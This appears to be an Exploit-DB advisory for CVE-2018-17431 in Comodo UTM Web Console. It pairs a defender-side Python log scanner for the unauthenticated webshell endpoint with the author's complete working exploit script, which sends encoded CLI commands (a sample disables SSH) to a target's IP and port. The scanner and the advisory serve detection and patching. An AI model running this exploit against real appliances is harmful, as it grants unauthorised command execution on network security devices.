Vendor: Comodo Unified Threat Management Web Console
By: Milad Fadavvi
CVSS: 9.8 (CRITICAL)
Type: Remote Code Execution
CWE: 78
Product Name: Comodo Unified Threat Management Web Console
Affected Versions: Releases before 2.7.0 & 1.5.0
Patch Exists: YES
Related CVE: CVE-2018-17431
CPE: a:comodo:unified_threat_management_web_console
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows, Kali
Year: 2018

Comodo Unified Threat Management Web Console 2.7.0 – Remote Code Execution

A vulnerability in Comodo Unified Threat Management (UTM) Web Console versions before 2.7.0 and 1.5.0 allows an unauthenticated attacker to execute arbitrary code on the system. The cause is a lack of authentication on the webshell/u endpoint: a single crafted request to it is enough to run commands on the appliance. In the PoC below, the command is passed percent-encoded in the k query parameter (the sample payload decodes to the UTM CLI lines service, ssh, disable), and the console's "Configuration has been altered" response confirms that the command was applied.

Mitigation:

Upgrade to version 2.7.0 or 1.5.0 of Comodo UTM Web Console
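As a defender-side addition (not part of the Exploit-DB entry or the author's PoC), the scanner below flags access-log requests to the unauthenticated /manage/webshell/u endpoint and decodes the percent-encoded k parameter into the CLI lines it carries, so the SOC can see what was typed. The Common Log Format lines and IP addresses are constructed samples; the real appliance or reverse-proxy log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Common Log Format; the real appliance or
# reverse-proxy log format is not on the page and is an assumption here.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Aug/2018:10:01:02 +0000] "GET /manage/webshell/u?s=4&w=120&h=40&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=10&_=1534327262000 HTTP/1.1" 200 512
203.0.113.5 - - [15/Aug/2018:10:01:03 +0000] "GET /manage/webshell/u?s=4&w=120&h=40&k=%0a&l=10&_=1534327263000 HTTP/1.1" 200 640
198.51.100.7 - - [15/Aug/2018:10:02:00 +0000] "GET /manage/login HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
WEBSHELL_PATH = "/manage/webshell/u"


def webshell_cli_lines(target):
    """If `target` is a request to the webshell endpoint, return the CLI lines
    carried in its k parameter (%0a, the Enter key, separates lines); else None."""
    parts = urlsplit(target)
    if parts.path != WEBSHELL_PATH:
        return None
    # parse_qs percent-decodes values, so %73%65... becomes the literal text.
    keystrokes = parse_qs(parts.query, keep_blank_values=True).get("k", [""])[0]
    return [line for line in keystrokes.split("\n") if line.strip()]


def find_webshell_requests(log_text):
    """Return one finding per request to the webshell endpoint: source, time,
    HTTP status and decoded CLI lines (empty for a bare Enter keystroke)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        cli = webshell_cli_lines(m.group("target"))
        if cli is None:
            continue
        findings.append({"src": m.group("src"), "ts": m.group("ts"),
                         "status": m.group("status"), "cli_lines": cli})
    return findings


if __name__ == "__main__":
    for f in find_webshell_requests(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} status={f['status']} cli={f['cli_lines']}")
```

Any hit from a source that never authenticated to /manage is worth an alert on its own; the decoded lines tell you what configuration change to look for on the appliance.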

Exploit-DB raw data:

# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE details: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8

import sys
import requests


def rnd_int(length):
    """Return a string of `length` random decimal digits, used to fill the
    session/size/nonce query parameters the console expects."""
    from random import choice
    from string import digits

    return ''.join(choice(digits) for _ in range(length))


if __name__ == "__main__":

    IP = input("IP: ")
    Port = input("Port: ")

    # Percent-encoded UTM CLI keystrokes; %0a is Enter. This sample disables SSH.
    # For other commands, read the manual of the specific Comodo UTM version and
    # the exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC).
    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a'  ## Disable SSH

    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + rnd_int(1) + "&w=" + rnd_int(3) + "&h=" + rnd_int(2)
    BaseNComdURL = BaseURL + "&k=" + Command
    LastPart = "&l=" + rnd_int(2) + "&_=" + rnd_int(13)
    FullURL = BaseNComdURL + LastPart
    AdditionalEnter = BaseURL + "&k=%0a" + LastPart  # a lone Enter keystroke sent after the command

    try:
        FirstResponse = requests.get(FullURL).text
    except requests.RequestException:
        print('\nExploit failed due to an HTTP error. Check the given IP and port!\n')
        sys.exit(1)

    SecondResponse = requests.get(AdditionalEnter).text
    if SecondResponse.find("Configuration has been altered") == -1:
        print("\nExploit Failed!\n")
        sys.exit(1)
    else:
        print("\nOK! Command Ran!\n")
    sys.exit(0)